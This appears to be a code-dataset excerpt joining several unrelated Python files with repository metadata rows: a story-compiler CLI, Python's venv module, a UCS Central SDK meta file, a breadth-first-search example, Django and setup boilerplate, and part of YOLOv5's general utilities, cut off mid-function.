@click.option('--silent', '-s', is_flag=True, help=silent_help)
@click.option('--debug', is_flag=True)
@click.option('--concise', '-c', is_flag=True)
@click.option('--first', '-f', is_flag=True)
@click.option('--ebnf', help=ebnf_help)
@click.option('--ignore', default=None,
help='Specify path of ignored files')
@click.option('--preview', callback=preview_cb, is_eager=True,
multiple=True, help=preview_help)
def compile(path, output, json, silent, debug, ebnf, ignore, concise,
first, preview):
"""
Compiles stories and validates syntax
"""
try:
results = App.compile(path, ignored_path=ignore,
ebnf=ebnf, concise=concise, first=first,
features=preview)
if not silent:
if json:
if output:
with io.open(output, 'w') as f:
f.write(results)
exit()
click.echo(results)
else:
msg = 'Script syntax passed!'
click.echo(click.style(msg, fg='green'))
except StoryError as e:
if debug:
raise e.error
else:
e.echo()
exit(1)
except Exception as e:
if debug:
raise e
else:
StoryError.internal_error(e).echo()
exit(1)
@staticmethod
@main.command(aliases=['l'])
@click.argument('path', default=os.getcwd())
@click.option('--ebnf', help=ebnf_help)
@click.option('--debug', is_flag=True)
@click.option('--preview', callback=preview_cb, is_eager=True,
multiple=True, help=preview_help)
def lex(path, ebnf, debug, preview):
"""
Shows lexer tokens for given stories
"""
try:
results = App.lex(path, ebnf=ebnf, features=preview)
for file, tokens in results.items():
click.echo('File: {}'.format(file))
for n, token in enumerate(tokens):
click.echo('{} {} {}'.format(n, token.type, token.value))
except StoryError as e:
if debug:
raise e.error
else:
e.echo()
exit(1)
except Exception as e:
if debug:
raise e
else:
StoryError.internal_error(e).echo()
exit(1)
@staticmethod
@main.command(aliases=['g'])
def grammar():
"""
Prints the grammar specification
"""
click.echo(App.grammar())
@staticmethod
@main.command(aliases=['n'])
@click.argument('name')
def new(name):
"""
Creates a new project
"""
Project.new(name)
@staticmethod
@main.command(aliases=['h'])
@click.pass_context
def help(context):
"""
Prints this help text
"""
click.echo(context.parent.get_help())
@staticmethod
@main.command(aliases=['v'])
def version():
"""
Prints the current version
"""
click.echo(app_version)
| 31.509434
| 77
| 0.538024
|
8d2deb738560edfc77fe50b8b99b462e62687bbb
| 16,397
|
py
|
Python
|
front-end/testsuite-python-lib/Python-3.3.0/Lib/venv/__init__.py
|
MalloyPower/parsing-python
|
b2bca5eed07ea2af7a2001cd4f63becdfb0570be
|
[
"MIT"
] | 1
|
2020-11-26T18:53:46.000Z
|
2020-11-26T18:53:46.000Z
|
front-end/testsuite-python-lib/Python-3.3.0/Lib/venv/__init__.py
|
MalloyPower/parsing-python
|
b2bca5eed07ea2af7a2001cd4f63becdfb0570be
|
[
"MIT"
] | null | null | null |
front-end/testsuite-python-lib/Python-3.3.0/Lib/venv/__init__.py
|
MalloyPower/parsing-python
|
b2bca5eed07ea2af7a2001cd4f63becdfb0570be
|
[
"MIT"
] | 1
|
2019-04-11T11:27:01.000Z
|
2019-04-11T11:27:01.000Z
|
"""
Virtual environment (venv) package for Python. Based on PEP 405.
Copyright (C) 2011-2012 Vinay Sajip.
Licensed to the PSF under a contributor agreement.
usage: python -m venv [-h] [--system-site-packages] [--symlinks] [--clear]
[--upgrade]
ENV_DIR [ENV_DIR ...]
Creates virtual Python environments in one or more target directories.
positional arguments:
ENV_DIR A directory to create the environment in.
optional arguments:
-h, --help show this help message and exit
--system-site-packages
Give the virtual environment access to the system
site-packages dir.
--symlinks Attempt to symlink rather than copy.
--clear Delete the environment directory if it already exists.
If not specified and the directory exists, an error is
raised.
--upgrade Upgrade the environment directory to use this version
of Python, assuming Python has been upgraded in-place.
"""
import base64
import io
import logging
import os
import os.path
import shutil
import sys
import sysconfig
try:
import threading
except ImportError:
threading = None
logger = logging.getLogger(__name__)
class Context:
"""
Holds information about a current venv creation/upgrade request.
"""
pass
class EnvBuilder:
"""
This class exists to allow virtual environment creation to be
customised. The constructor parameters determine the builder's
behaviour when called upon to create a virtual environment.
By default, the builder makes the system (global) site-packages dir
available to the created environment.
By default, the creation process uses symlinks wherever possible.
:param system_site_packages: If True, the system (global) site-packages
dir is available to created environments.
:param clear: If True and the target directory exists, it is deleted.
Otherwise, if the target directory exists, an error is
raised.
:param symlinks: If True, attempt to symlink rather than copy files into
virtual environment.
:param upgrade: If True, upgrade an existing virtual environment.
"""
def __init__(self, system_site_packages=False, clear=False,
symlinks=False, upgrade=False):
self.system_site_packages = system_site_packages
self.clear = clear
self.symlinks = symlinks
self.upgrade = upgrade
def create(self, env_dir):
"""
Create a virtual environment in a directory.
:param env_dir: The target directory to create an environment in.
"""
env_dir = os.path.abspath(env_dir)
context = self.ensure_directories(env_dir)
self.create_configuration(context)
self.setup_python(context)
if not self.upgrade:
self.setup_scripts(context)
self.post_setup(context)
def ensure_directories(self, env_dir):
"""
Create the directories for the environment.
Returns a context object which holds paths in the environment,
for use by subsequent logic.
"""
def create_if_needed(d):
if not os.path.exists(d):
os.makedirs(d)
if os.path.exists(env_dir) and not (self.clear or self.upgrade):
raise ValueError('Directory exists: %s' % env_dir)
if os.path.exists(env_dir) and self.clear:
shutil.rmtree(env_dir)
context = Context()
context.env_dir = env_dir
context.env_name = os.path.split(env_dir)[1]
context.prompt = '(%s) ' % context.env_name
create_if_needed(env_dir)
env = os.environ
if sys.platform == 'darwin' and '__PYVENV_LAUNCHER__' in env:
executable = os.environ['__PYVENV_LAUNCHER__']
else:
executable = sys.executable
dirname, exename = os.path.split(os.path.abspath(executable))
context.executable = executable
context.python_dir = dirname
context.python_exe = exename
if sys.platform == 'win32':
binname = 'Scripts'
incpath = 'Include'
libpath = os.path.join(env_dir, 'Lib', 'site-packages')
else:
binname = 'bin'
incpath = 'include'
libpath = os.path.join(env_dir, 'lib', 'python%d.%d' % sys.version_info[:2], 'site-packages')
context.inc_path = path = os.path.join(env_dir, incpath)
create_if_needed(path)
create_if_needed(libpath)
context.bin_path = binpath = os.path.join(env_dir, binname)
context.bin_name = binname
context.env_exe = os.path.join(binpath, exename)
create_if_needed(binpath)
return context
def create_configuration(self, context):
"""
Create a configuration file indicating where the environment's Python
was copied from, and whether the system site-packages should be made
available in the environment.
:param context: The information for the environment creation request
being processed.
"""
context.cfg_path = path = os.path.join(context.env_dir, 'pyvenv.cfg')
with open(path, 'w', encoding='utf-8') as f:
f.write('home = %s\n' % context.python_dir)
if self.system_site_packages:
incl = 'true'
else:
incl = 'false'
f.write('include-system-site-packages = %s\n' % incl)
f.write('version = %d.%d.%d\n' % sys.version_info[:3])
if os.name == 'nt':
def include_binary(self, f):
if f.endswith(('.pyd', '.dll')):
result = True
else:
result = f.startswith('python') and f.endswith('.exe')
return result
def symlink_or_copy(self, src, dst):
"""
Try symlinking a file, and if that fails, fall back to copying.
"""
force_copy = not self.symlinks
if not force_copy:
try:
if not os.path.islink(dst): # can't link to itself!
os.symlink(src, dst)
except Exception: # may need to use a more specific exception
logger.warning('Unable to symlink %r to %r', src, dst)
force_copy = True
if force_copy:
shutil.copyfile(src, dst)
def setup_python(self, context):
"""
Set up a Python executable in the environment.
:param context: The information for the environment creation request
being processed.
"""
binpath = context.bin_path
exename = context.python_exe
path = context.env_exe
copier = self.symlink_or_copy
copier(context.executable, path)
dirname = context.python_dir
if os.name != 'nt':
if not os.path.islink(path):
os.chmod(path, 0o755)
for suffix in ('python', 'python3'):
path = os.path.join(binpath, suffix)
if not os.path.exists(path):
os.symlink(exename, path)
else:
subdir = 'DLLs'
include = self.include_binary
files = [f for f in os.listdir(dirname) if include(f)]
for f in files:
src = os.path.join(dirname, f)
dst = os.path.join(binpath, f)
if dst != context.env_exe: # already done, above
copier(src, dst)
dirname = os.path.join(dirname, subdir)
if os.path.isdir(dirname):
files = [f for f in os.listdir(dirname) if include(f)]
for f in files:
src = os.path.join(dirname, f)
dst = os.path.join(binpath, f)
copier(src, dst)
# copy init.tcl over
for root, dirs, files in os.walk(context.python_dir):
if 'init.tcl' in files:
tcldir = os.path.basename(root)
tcldir = os.path.join(context.env_dir, 'Lib', tcldir)
os.makedirs(tcldir)
src = os.path.join(root, 'init.tcl')
dst = os.path.join(tcldir, 'init.tcl')
shutil.copyfile(src, dst)
break
def setup_scripts(self, context):
"""
Set up scripts into the created environment from a directory.
This method installs the default scripts into the environment
being created. You can prevent the default installation by overriding
this method if you really need to, or if you need to specify
a different location for the scripts to install. By default, the
'scripts' directory in the venv package is used as the source of
scripts to install.
"""
path = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(path, 'scripts')
self.install_scripts(context, path)
def post_setup(self, context):
"""
Hook for post-setup modification of the venv. Subclasses may install
additional packages or scripts here, add activation shell scripts, etc.
:param context: The information for the environment creation request
being processed.
"""
pass
def replace_variables(self, text, context):
"""
Replace variable placeholders in script text with context-specific
variables.
        Return the text passed in, but with variables replaced.
:param text: The text in which to replace placeholder variables.
:param context: The information for the environment creation request
being processed.
"""
text = text.replace('__VENV_DIR__', context.env_dir)
text = text.replace('__VENV_NAME__', context.prompt)
text = text.replace('__VENV_BIN_NAME__', context.bin_name)
text = text.replace('__VENV_PYTHON__', context.env_exe)
return text
def install_scripts(self, context, path):
"""
Install scripts into the created environment from a directory.
:param context: The information for the environment creation request
being processed.
:param path: Absolute pathname of a directory containing script.
Scripts in the 'common' subdirectory of this directory,
and those in the directory named for the platform
being run on, are installed in the created environment.
Placeholder variables are replaced with environment-
specific values.
"""
binpath = context.bin_path
plen = len(path)
for root, dirs, files in os.walk(path):
if root == path: # at top-level, remove irrelevant dirs
for d in dirs[:]:
if d not in ('common', os.name):
dirs.remove(d)
continue # ignore files in top level
for f in files:
srcfile = os.path.join(root, f)
suffix = root[plen:].split(os.sep)[2:]
if not suffix:
dstdir = binpath
else:
dstdir = os.path.join(binpath, *suffix)
if not os.path.exists(dstdir):
os.makedirs(dstdir)
dstfile = os.path.join(dstdir, f)
with open(srcfile, 'rb') as f:
data = f.read()
if srcfile.endswith('.exe'):
mode = 'wb'
else:
mode = 'w'
data = data.decode('utf-8')
data = self.replace_variables(data, context)
with open(dstfile, mode) as f:
f.write(data)
shutil.copymode(srcfile, dstfile)
def create(env_dir, system_site_packages=False, clear=False, symlinks=False):
"""
Create a virtual environment in a directory.
By default, makes the system (global) site-packages dir available to
the created environment.
:param env_dir: The target directory to create an environment in.
:param system_site_packages: If True, the system (global) site-packages
dir is available to the environment.
:param clear: If True and the target directory exists, it is deleted.
Otherwise, if the target directory exists, an error is
raised.
:param symlinks: If True, attempt to symlink rather than copy files into
virtual environment.
"""
builder = EnvBuilder(system_site_packages=system_site_packages,
clear=clear, symlinks=symlinks)
builder.create(env_dir)
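# Hedged usage sketch (added, not part of the original module): programmatic
# creation of an environment, equivalent to running ``python -m venv``; the
# target path below is only an example.
#
#     builder = EnvBuilder(system_site_packages=False, clear=True, symlinks=True)
#     builder.create('/tmp/example-env')
#
# or simply ``create('/tmp/example-env', clear=True)`` via the helper above.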
def main(args=None):
compatible = True
if sys.version_info < (3, 3):
compatible = False
elif not hasattr(sys, 'base_prefix'):
compatible = False
if not compatible:
raise ValueError('This script is only for use with Python 3.3')
else:
import argparse
parser = argparse.ArgumentParser(prog=__name__,
description='Creates virtual Python '
'environments in one or '
'more target '
'directories.',
epilog='Once an environment has been '
'created, you may wish to '
'activate it, e.g. by '
'sourcing an activate script '
'in its bin directory.')
parser.add_argument('dirs', metavar='ENV_DIR', nargs='+',
help='A directory to create the environment in.')
parser.add_argument('--system-site-packages', default=False,
action='store_true', dest='system_site',
help='Give the virtual environment access to the '
'system site-packages dir.')
if os.name == 'nt':
use_symlinks = False
else:
use_symlinks = True
parser.add_argument('--symlinks', default=use_symlinks,
action='store_true', dest='symlinks',
help='Try to use symlinks rather than copies, '
'when symlinks are not the default for '
'the platform.')
parser.add_argument('--clear', default=False, action='store_true',
dest='clear', help='Delete the environment '
'directory if it already '
'exists. If not specified and '
'the directory exists, an error'
' is raised.')
parser.add_argument('--upgrade', default=False, action='store_true',
dest='upgrade', help='Upgrade the environment '
'directory to use this version '
'of Python, assuming Python '
'has been upgraded in-place.')
options = parser.parse_args(args)
if options.upgrade and options.clear:
raise ValueError('you cannot supply --upgrade and --clear together.')
builder = EnvBuilder(system_site_packages=options.system_site,
clear=options.clear, symlinks=options.symlinks,
upgrade=options.upgrade)
for d in options.dirs:
builder.create(d)
if __name__ == '__main__':
rc = 1
try:
main()
rc = 0
except Exception as e:
print('Error: %s' % e, file=sys.stderr)
sys.exit(rc)
| 41.095238
| 105
| 0.554736
|
f1db7e2a3846ae5bb95517d709e5d0346e8f9f39
| 953
|
py
|
Python
|
ucscentralsdk/methodmeta/ConfigConfMoGroupMeta.py
|
ragupta-git/ucscentralsdk
|
2678008b5fb6b0fafafec388d0874147e95a1086
|
[
"Apache-2.0"
] | null | null | null |
ucscentralsdk/methodmeta/ConfigConfMoGroupMeta.py
|
ragupta-git/ucscentralsdk
|
2678008b5fb6b0fafafec388d0874147e95a1086
|
[
"Apache-2.0"
] | null | null | null |
ucscentralsdk/methodmeta/ConfigConfMoGroupMeta.py
|
ragupta-git/ucscentralsdk
|
2678008b5fb6b0fafafec388d0874147e95a1086
|
[
"Apache-2.0"
] | null | null | null |
"""This module contains the meta information of ConfigConfMoGroup ExternalMethod."""
from ..ucscentralcoremeta import MethodMeta, MethodPropertyMeta
method_meta = MethodMeta("ConfigConfMoGroup", "configConfMoGroup", "Version142b")
prop_meta = {
"cookie": MethodPropertyMeta("Cookie", "cookie", "Xs:string", "Version142b", "InputOutput", False),
"in_config": MethodPropertyMeta("InConfig", "inConfig", "ConfigConfig", "Version142b", "Input", True),
"in_dns": MethodPropertyMeta("InDns", "inDns", "DnSet", "Version142b", "Input", True),
"in_hierarchical": MethodPropertyMeta("InHierarchical", "inHierarchical", "Xs:string", "Version142b", "Input", False),
"out_configs": MethodPropertyMeta("OutConfigs", "outConfigs", "ConfigSet", "Version142b", "Output", True),
}
prop_map = {
"cookie": "cookie",
"inConfig": "in_config",
"inDns": "in_dns",
"inHierarchical": "in_hierarchical",
"outConfigs": "out_configs",
}
| 41.434783
| 122
| 0.705142
|
d3dbdfa79d765601c8746b92a508666e27db40ca
| 787
|
py
|
Python
|
BreadthFirstSearchPath.py
|
1090504117/PyStructureLearning
|
207d6e7a6b818d9665c2529f86fea70000cd674f
|
[
"MIT"
] | null | null | null |
BreadthFirstSearchPath.py
|
1090504117/PyStructureLearning
|
207d6e7a6b818d9665c2529f86fea70000cd674f
|
[
"MIT"
] | null | null | null |
BreadthFirstSearchPath.py
|
1090504117/PyStructureLearning
|
207d6e7a6b818d9665c2529f86fea70000cd674f
|
[
"MIT"
] | null | null | null |
from collections import deque
def person_is_seller(name):
return name[-1] == 'm'
def search(name):
graph = {}
graph["you"] = ["alice", "bob", "claire"]
graph["bob"] = ["anuj", "peggy"]
graph["alice"] = ["peggy"]
graph["claire"] = ["thom", "jonny"]
graph["anuj"] = []
graph["peggy"] = []
graph["thom"] = []
graph["jonny"] = []
search_queue = deque()
search_queue += graph[name]
searched = []
while search_queue:
person = search_queue.popleft()
        if person not in searched:
            if person_is_seller(person):
                print(person + " is a mango seller!")
return True
else:
search_queue += graph[person]
searched.append(person)
return False
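if __name__ == '__main__':
    # Demo (added sketch): starting from "you", the breadth-first search reaches
    # "thom", whose name ends in "m" and is therefore reported as a mango seller.
    search("you")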
| 27.137931
| 52
| 0.52986
|
ded315fc3018ed28ee637cff3af744b1de9c542f
| 134
|
py
|
Python
|
setup.py
|
kaustubh-sadekar/dlutils
|
91b98f7701f4d682ae2790e4cf41b9daa5e3cf77
|
[
"MIT"
] | 3
|
2020-03-12T09:21:24.000Z
|
2021-12-27T14:06:20.000Z
|
setup.py
|
kaustubh-sadekar/dlutils
|
91b98f7701f4d682ae2790e4cf41b9daa5e3cf77
|
[
"MIT"
] | null | null | null |
setup.py
|
kaustubh-sadekar/dlutils
|
91b98f7701f4d682ae2790e4cf41b9daa5e3cf77
|
[
"MIT"
] | null | null | null |
import setuptools
setuptools.setup(name = 'kdlutils', packages = ['dlutils.kdlutils'], version = '0.1', author = 'Kaustubh sadekar')
| 26.8
| 113
| 0.716418
|
f6a78aa3b721814a9683d58f4c57d377d074323b
| 405
|
py
|
Python
|
TTSHLINENotify/wsgi.py
|
vincentinttsh/TTSHLINENotify
|
3d6a460bf995aa22192eaf69acc0274b962acb75
|
[
"BSD-3-Clause"
] | null | null | null |
TTSHLINENotify/wsgi.py
|
vincentinttsh/TTSHLINENotify
|
3d6a460bf995aa22192eaf69acc0274b962acb75
|
[
"BSD-3-Clause"
] | null | null | null |
TTSHLINENotify/wsgi.py
|
vincentinttsh/TTSHLINENotify
|
3d6a460bf995aa22192eaf69acc0274b962acb75
|
[
"BSD-3-Clause"
] | null | null | null |
"""
WSGI config for TTSHLINENotify project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TTSHLINENotify.settings')
application = get_wsgi_application()
| 23.823529
| 78
| 0.792593
|
e1c14bdaa4b3bd5f4edb85637be60b42dce32b9a
| 23,894
|
py
|
Python
|
yolov5/utils/general.py
|
JadeMaveric/CoinShift-Imaging-Box
|
3d1599099697bc12ffc91ab9b50387dc9cb19092
|
[
"Apache-2.0"
] | 23
|
2021-01-19T11:55:53.000Z
|
2021-07-22T05:30:57.000Z
|
yolov5/utils/general.py
|
JadeMaveric/CoinShift-Imaging-Box
|
3d1599099697bc12ffc91ab9b50387dc9cb19092
|
[
"Apache-2.0"
] | 122
|
2021-03-06T15:46:08.000Z
|
2021-06-09T10:36:11.000Z
|
yolov5/utils/general.py
|
JadeMaveric/CoinShift-Imaging-Box
|
3d1599099697bc12ffc91ab9b50387dc9cb19092
|
[
"Apache-2.0"
] | 40
|
2021-01-20T13:12:52.000Z
|
2021-05-29T18:26:43.000Z
|
# General utils
import glob
import logging
import math
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import torch
import torchvision
import yaml
from utils.google_utils import gsutil_getsize
from utils.metrics import fitness
from utils.torch_utils import init_torch_seeds
# Settings
torch.set_printoptions(linewidth=320, precision=5, profile='long')
np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5
cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader)
os.environ['NUMEXPR_MAX_THREADS'] = str(min(os.cpu_count(), 8)) # NumExpr max threads
def set_logging(rank=-1):
logging.basicConfig(
format="%(message)s",
level=logging.INFO if rank in [-1, 0] else logging.WARN)
def init_seeds(seed=0):
# Initialize random number generator (RNG) seeds
random.seed(seed)
np.random.seed(seed)
init_torch_seeds(seed)
def get_latest_run(search_dir='.'):
# Return path to most recent 'last.pt' in /runs (i.e. to --resume from)
last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True)
return max(last_list, key=os.path.getctime) if last_list else ''
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def check_online():
# Check internet connectivity
import socket
try:
        socket.create_connection(("1.1.1.1", 443), 5)  # check host accessibility
return True
except OSError:
return False
def check_git_status():
# Recommend 'git pull' if code is out of date
print(colorstr('github: '), end='')
try:
assert Path('.git').exists(), 'skipping check (not a git repository)'
assert not isdocker(), 'skipping check (Docker image)'
assert check_online(), 'skipping check (offline)'
cmd = 'git fetch && git config --get remote.origin.url'
url = subprocess.check_output(cmd, shell=True).decode().strip().rstrip('.git') # github repo url
branch = subprocess.check_output('git rev-parse --abbrev-ref HEAD', shell=True).decode().strip() # checked out
n = int(subprocess.check_output(f'git rev-list {branch}..origin/master --count', shell=True)) # commits behind
if n > 0:
s = f"⚠️ WARNING: code is out of date by {n} commit{'s' * (n > 1)}. " \
f"Use 'git pull' to update or 'git clone {url}' to download latest."
else:
s = f'up to date with {url} ✅'
print(s.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else s)
except Exception as e:
print(e)
def check_requirements(file='requirements.txt', exclude=()):
# Check installed dependencies meet requirements
import pkg_resources
requirements = [f'{x.name}{x.specifier}' for x in pkg_resources.parse_requirements(Path(file).open())
if x.name not in exclude]
pkg_resources.require(requirements) # DistributionNotFound or VersionConflict exception if requirements not met
def check_img_size(img_size, s=32):
# Verify img_size is a multiple of stride s
new_size = make_divisible(img_size, int(s)) # ceil gs-multiple
if new_size != img_size:
print('WARNING: --img-size %g must be multiple of max stride %g, updating to %g' % (img_size, s, new_size))
return new_size
def check_imshow():
# Check if environment supports image displays
try:
assert not isdocker(), 'cv2.imshow() is disabled in Docker environments'
cv2.imshow('test', np.zeros((1, 1, 3)))
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return True
except Exception as e:
print(f'WARNING: Environment does not support cv2.imshow() or PIL Image.show() image displays\n{e}')
return False
def check_file(file):
# Search for file if not found
if os.path.isfile(file) or file == '':
return file
else:
files = glob.glob('./**/' + file, recursive=True) # find file
assert len(files), 'File Not Found: %s' % file # assert file was found
assert len(files) == 1, "Multiple files match '%s', specify exact path: %s" % (file, files) # assert unique
return files[0] # return file
def check_dataset(dict):
# Download dataset if not found locally
val, s = dict.get('val'), dict.get('download')
if val and len(val):
val = [Path(x).resolve() for x in (val if isinstance(val, list) else [val])] # val path
if not all(x.exists() for x in val):
print('\nWARNING: Dataset not found, nonexistent paths: %s' % [str(x) for x in val if not x.exists()])
if s and len(s): # download script
print('Downloading %s ...' % s)
if s.startswith('http') and s.endswith('.zip'): # URL
f = Path(s).name # filename
torch.hub.download_url_to_file(s, f)
r = os.system('unzip -q %s -d ../ && rm %s' % (f, f)) # unzip
else: # bash script
r = os.system(s)
print('Dataset autodownload %s\n' % ('success' if r == 0 else 'failure')) # analyze return value
else:
raise Exception('Dataset not found.')
def make_divisible(x, divisor):
# Returns x evenly divisible by divisor
return math.ceil(x / divisor) * divisor
def clean_str(s):
# Cleans a string by replacing special characters with underscore _
return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s)
def one_cycle(y1=0.0, y2=1.0, steps=100):
# lambda function for sinusoidal ramp from y1 to y2
return lambda x: ((1 - math.cos(x * math.pi / steps)) / 2) * (y2 - y1) + y1
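# Illustrative values (added, not part of the original file): one_cycle(0.0, 1.0, 100)
# maps x=0 -> 0.0, x=50 -> 0.5 and x=100 -> 1.0 along a cosine-shaped ramp.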
def colorstr(*input):
# Colors a string https://en.wikipedia.org/wiki/ANSI_escape_code, i.e. colorstr('blue', 'hello world')
*args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string
colors = {'black': '\033[30m', # basic colors
'red': '\033[31m',
'green': '\033[32m',
'yellow': '\033[33m',
'blue': '\033[34m',
'magenta': '\033[35m',
'cyan': '\033[36m',
'white': '\033[37m',
'bright_black': '\033[90m', # bright colors
'bright_red': '\033[91m',
'bright_green': '\033[92m',
'bright_yellow': '\033[93m',
'bright_blue': '\033[94m',
'bright_magenta': '\033[95m',
'bright_cyan': '\033[96m',
'bright_white': '\033[97m',
'end': '\033[0m', # misc
'bold': '\033[1m',
'underline': '\033[4m'}
return ''.join(colors[x] for x in args) + f'{string}' + colors['end']
def labels_to_class_weights(labels, nc=80):
# Get class weights (inverse frequency) from training labels
if labels[0] is None: # no labels loaded
return torch.Tensor()
labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO
classes = labels[:, 0].astype(np.int) # labels = [class xywh]
weights = np.bincount(classes, minlength=nc) # occurrences per class
# Prepend gridpoint count (for uCE training)
# gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image
# weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start
weights[weights == 0] = 1 # replace empty bins with 1
weights = 1 / weights # number of targets per class
weights /= weights.sum() # normalize
return torch.from_numpy(weights)
def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)):
# Produces image weights based on class_weights and image contents
class_counts = np.array([np.bincount(x[:, 0].astype(np.int), minlength=nc) for x in labels])
image_weights = (class_weights.reshape(1, nc) * class_counts).sum(1)
# index = random.choices(range(n), weights=image_weights, k=1) # weight image sample
return image_weights
def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper)
# https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/
# a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n')
# b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n')
# x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco
# x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34,
35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63,
64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90]
return x
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
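# Worked example (added, not part of the original file): an assumed box
# [x, y, w, h] = [50, 40, 20, 10] converts to [x1, y1, x2, y2] = [40, 35, 60, 45],
# and xyxy2xywh() maps that result back to the original center format.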
def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0):
# Convert nx4 boxes from [x, y, w, h] normalized to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * (x[:, 0] - x[:, 2] / 2) + padw # top left x
y[:, 1] = h * (x[:, 1] - x[:, 3] / 2) + padh # top left y
y[:, 2] = w * (x[:, 0] + x[:, 2] / 2) + padw # bottom right x
y[:, 3] = h * (x[:, 1] + x[:, 3] / 2) + padh # bottom right y
return y
def xyn2xy(x, w=640, h=640, padw=0, padh=0):
# Convert normalized segments into pixel segments, shape (n,2)
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * x[:, 0] + padw # top left x
y[:, 1] = h * x[:, 1] + padh # top left y
return y
def segment2box(segment, width=640, height=640):
# Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy)
x, y = segment.T # segment xy
inside = (x >= 0) & (y >= 0) & (x <= width) & (y <= height)
x, y, = x[inside], y[inside]
return np.array([x.min(), y.min(), x.max(), y.max()]) if any(x) else np.zeros((1, 4)) # cls, xyxy
def segments2boxes(segments):
# Convert segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh)
boxes = []
for s in segments:
x, y = s.T # segment xy
boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy
return xyxy2xywh(np.array(boxes)) # cls, xywh
def resample_segments(segments, n=1000):
# Up-sample an (n,2) segment
for i, s in enumerate(segments):
x = np.linspace(0, len(s) - 1, n)
xp = np.arange(len(s))
segments[i] = np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)]).reshape(2, -1).T # segment xy
return segments
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):
# Rescale coords (xyxy) from img1_shape to img0_shape
if ratio_pad is None: # calculate from img0_shape
gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new
pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding
else:
gain = ratio_pad[0][0]
pad = ratio_pad[1]
coords[:, [0, 2]] -= pad[0] # x padding
coords[:, [1, 3]] -= pad[1] # y padding
coords[:, :4] /= gain
clip_coords(coords, img0_shape)
return coords
def clip_coords(boxes, img_shape):
# Clip bounding xyxy bounding boxes to image shape (height, width)
boxes[:, 0].clamp_(0, img_shape[1]) # x1
boxes[:, 1].clamp_(0, img_shape[0]) # y1
boxes[:, 2].clamp_(0, img_shape[1]) # x2
boxes[:, 3].clamp_(0, img_shape[0]) # y2
def bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7):
# Returns the IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.T
# Get the coordinates of bounding boxes
if x1y1x2y2: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else: # transform from xywh to xyxy
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
